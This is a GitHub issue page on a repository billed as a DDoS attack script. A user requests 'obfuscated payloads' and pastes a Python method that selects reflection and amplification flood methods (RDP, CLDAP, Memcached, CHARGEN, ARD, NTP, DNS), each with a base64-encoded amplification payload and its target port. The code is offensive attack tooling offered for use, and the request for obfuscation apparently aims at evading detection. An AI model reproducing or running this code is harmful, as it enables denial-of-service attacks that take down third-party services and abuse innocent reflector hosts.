MatrixTM / MHDDoS

Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods
MIT License
12.49k stars 2.6k forks source link

obuscated payloads etc #552

Closed s-b-repo closed 2 months ago

s-b-repo commented 3 months ago

Which section is this feature request for?

L7 (DDoS Attack Layer 7)

Is there an existing issue for this?

Is your feature request related to a problem? Please describe the problem.

import base64

def select(self, name): self.SENT_FLOOD = self.TCP for key, value in self.methods.items(): if name == key: self.SENT_FLOOD = value elif name == "ICMP": self.SENT_FLOOD = self.ICMP self._target = (self._target[0], 0) elif name == "RDP": self._amp_payload = ( base64.b64decode('AAAAAAAAXwAAAAAAAAB+AAAA'), 3389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "CLDAP": self._amp_payload = ( base64.b64decode('MCMCA2MgBAAKAQoAAgACAAIAgQAAgY7b2JqZWN0Y2xhc3MwAA=='), 389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "MEM": self._amp_payload = ( base64.b64decode('AAEAAAAABwBoAGUAbgB0AHMAIABwACAAYQAgAGgAIABlAG4A'), 11211) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "CHAR": self._amp_payload = (base64.b64decode('AQ=='), 19) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "ARD": self._amp_payload = (base64.b64decode('ABQAAAAAAAAA'), 3283) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "NTP": self._amp_payload = (base64.b64decode('FwADMgAAAAA='), 123) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "DNS": self._amp_payload = ( base64.b64decode('RWeABAAABQAAAAAAABzBAAABgAAACYAf/AAAA=='), 53) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp())

Describe the solution you'd like

already made one

Additional context

No response